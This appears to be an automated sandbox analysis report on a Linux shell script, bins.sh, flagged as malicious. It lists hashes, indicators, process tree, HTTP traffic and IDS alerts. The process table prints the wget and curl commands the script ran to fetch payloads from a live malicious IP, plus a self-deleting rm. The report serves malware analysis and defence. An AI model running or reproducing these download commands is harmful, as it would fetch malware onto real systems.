| File name: | bins.sh |
| Full analysis: | https://app.any.run/tasks/497238e7-57a8-430e-a2c2-e6f9a0f21ffc |
| Verdict: | Malicious activity |
| Analysis date: | November 19, 2024, 06:15:40 |
| OS: | Ubuntu 22.04.2 LTS |
| MIME: | text/x-shellscript |
| File info: | Bourne-Again shell script, ASCII text executable, with very long lines (411) |
| MD5: | 928AC3545F37F454486C6DA121B1D8AD |
| SHA1: | 3046C6680906DB848C9B0214B81114B98B1E3B37 |
| SHA256: | 77FA3F4917BE2F66CB783171A3CF1C2503A25D6E4D419F6C00633D18EA183AFB |
| SSDEEP: | 192:mpJrZ7BB997eSM7y+WT79/o9/Y9/h/S/+/kaz0z8zTA8aTXHdUdcddCmFXeXSX5X:AZx9E68h6CdCmVG65iCpkzaiHDg6CdC6 |
MALICIOUS
No malicious indicators.SUSPICIOUS
Executes the "rm" command to delete files or directories
- bash (PID: 35805)
Connects to the server without a host name
- busybox (PID: 35920)
- wget (PID: 35854)
- curl (PID: 35811)
- busybox (PID: 35882)
- wget (PID: 35893)
- wget (PID: 35808)
- wget (PID: 35927)
- busybox (PID: 35847)
- wget (PID: 35962)
- busybox (PID: 35955)
- wget (PID: 36065)
- wget (PID: 36097)
- busybox (PID: 36136)
- wget (PID: 36150)
- curl (PID: 36152)
- busybox (PID: 36184)
- busybox (PID: 35990)
- wget (PID: 35996)
- busybox (PID: 36021)
- wget (PID: 36026)
- busybox (PID: 36054)
- busybox (PID: 36092)
- wget (PID: 36262)
- busybox (PID: 36320)
- wget (PID: 36295)
- wget (PID: 36325)
- busybox (PID: 36352)
- wget (PID: 36356)
- busybox (PID: 36473)
- busybox (PID: 36412)
- wget (PID: 36416)
- busybox (PID: 36442)
- wget (PID: 36446)
- wget (PID: 36189)
- busybox (PID: 36219)
- wget (PID: 36225)
- busybox (PID: 36252)
- busybox (PID: 36290)
- busybox (PID: 36381)
- busybox (PID: 36532)
- wget (PID: 36536)
- wget (PID: 36566)
- busybox (PID: 36562)
- curl (PID: 36599)
- curl (PID: 36567)
- busybox (PID: 36594)
- busybox (PID: 36655)
- busybox (PID: 36684)
- busybox (PID: 36624)
- wget (PID: 36628)
- wget (PID: 36659)
- wget (PID: 36688)
- wget (PID: 36477)
- busybox (PID: 36503)
- wget (PID: 36385)
- wget (PID: 36507)
- wget (PID: 36598)
- busybox (PID: 36717)
- curl (PID: 36689)
- curl (PID: 36722)
- busybox (PID: 36746)
- wget (PID: 36721)
Modifies file or directory owner
- sudo (PID: 35800)
Executes commands using command-line interpreter
- sudo (PID: 35803)
Reads /proc/mounts (likely used to find writable filesystems)
- curl (PID: 36152)
- curl (PID: 35811)
- python3.10 (PID: 36127)
- curl (PID: 36567)
- curl (PID: 36599)
- curl (PID: 36689)
- curl (PID: 36722)
Uses wget to download content
- bash (PID: 35805)
Checks the user who created the process
- cron (PID: 36714)
INFO
No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .sh | | | Linux/UNIX shell script (100) |
|---|
Total processes
502
Monitored processes
283
Malicious processes
19
Suspicious processes
11
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 35799 | /bin/sh -c "sudo chown user /home/user/Desktop/bins\.sh && chmod +x /home/user/Desktop/bins\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/bins\.sh " | /usr/bin/dash | — | any-guest-agent |
User: user Integrity Level: UNKNOWN Exit code: 256 | ||||
| 35800 | sudo chown user /home/user/Desktop/bins.sh | /usr/bin/sudo | — | dash |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
| 35801 | chown user /home/user/Desktop/bins.sh | /usr/bin/chown | — | sudo |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
| 35802 | chmod +x /home/user/Desktop/bins.sh | /usr/bin/chmod | — | dash |
User: user Integrity Level: UNKNOWN Exit code: 0 | ||||
| 35803 | sudo -iu user /home/user/Desktop/bins.sh | /usr/bin/sudo | — | dash |
User: root Integrity Level: UNKNOWN Exit code: 256 | ||||
| 35805 | /bin/bash /home/user/Desktop/bins.sh | /usr/bin/bash | — | sudo |
User: user Integrity Level: UNKNOWN Exit code: 256 | ||||
| 35806 | /usr/bin/locale-check C.UTF-8 | /usr/bin/locale-check | — | bash |
User: user Integrity Level: UNKNOWN Exit code: 0 | ||||
| 35807 | /bin/rm bins.sh | /usr/bin/rm | — | bash |
User: user Integrity Level: UNKNOWN Exit code: 256 | ||||
| 35808 | wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /usr/bin/wget | bash | |
User: user Integrity Level: UNKNOWN Exit code: 2048 | ||||
| 35811 | /snap/curl/1754/bin/curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /snap/curl/1754/bin/curl | bash | |
User: user Integrity Level: UNKNOWN Exit code: 0 | ||||
Executable files
0
Suspicious files
0
Text files
0
Unknown types
0
Dropped files
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
129
TCP/UDP connections
97
DNS requests
15
Threats
28
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 204 | 185.125.190.18:80 | http://connectivity-check.ubuntu.com/ | unknown | — | — | whitelisted |
— | — | GET | 204 | 185.125.190.18:80 | http://connectivity-check.ubuntu.com/ | unknown | — | — | whitelisted |
— | — | GET | 204 | 185.125.190.49:80 | http://connectivity-check.ubuntu.com/ | unknown | — | — | whitelisted |
35811 | curl | GET | 404 | 87.120.125.191:80 | http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | unknown | — | — | unknown |
35808 | wget | GET | 404 | 87.120.125.191:80 | http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | unknown | — | — | unknown |
35847 | busybox | GET | 404 | 87.120.125.191:80 | http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | unknown | — | — | unknown |
35854 | wget | GET | 404 | 87.120.125.191:80 | http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | unknown | — | — | unknown |
— | — | GET | 404 | 87.120.125.191:80 | http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | unknown | — | — | unknown |
35893 | wget | GET | 404 | 87.120.125.191:80 | http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | unknown | — | — | unknown |
— | — | GET | 404 | 87.120.125.191:80 | http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
484 | avahi-daemon | 224.0.0.251:5353 | — | — | — | unknown |
— | — | 207.211.211.26:443 | odrs.gnome.org | — | US | whitelisted |
— | — | 185.125.190.49:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted |
— | — | 185.125.190.18:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted |
35808 | wget | 87.120.125.191:80 | — | Yuri Jordanov Ltd. | BG | malicious |
35811 | curl | 87.120.125.191:80 | — | Yuri Jordanov Ltd. | BG | malicious |
512 | snapd | 185.125.188.55:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
35847 | busybox | 87.120.125.191:80 | — | Yuri Jordanov Ltd. | BG | malicious |
512 | snapd | 185.125.188.54:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
35854 | wget | 87.120.125.191:80 | — | Yuri Jordanov Ltd. | BG | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
odrs.gnome.org |
| whitelisted |
connectivity-check.ubuntu.com |
| whitelisted |
google.com |
| whitelisted |
20.100.168.192.in-addr.arpa |
| unknown |
api.snapcraft.io |
| whitelisted |
changelogs.ubuntu.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
35811 | curl | Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad |
— | — | Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad |
— | — | Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad |
— | — | Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad |
— | — | Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad |
— | — | Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad |
— | — | Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad |
— | — | Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad |
— | — | Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad |
36152 | curl | Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad |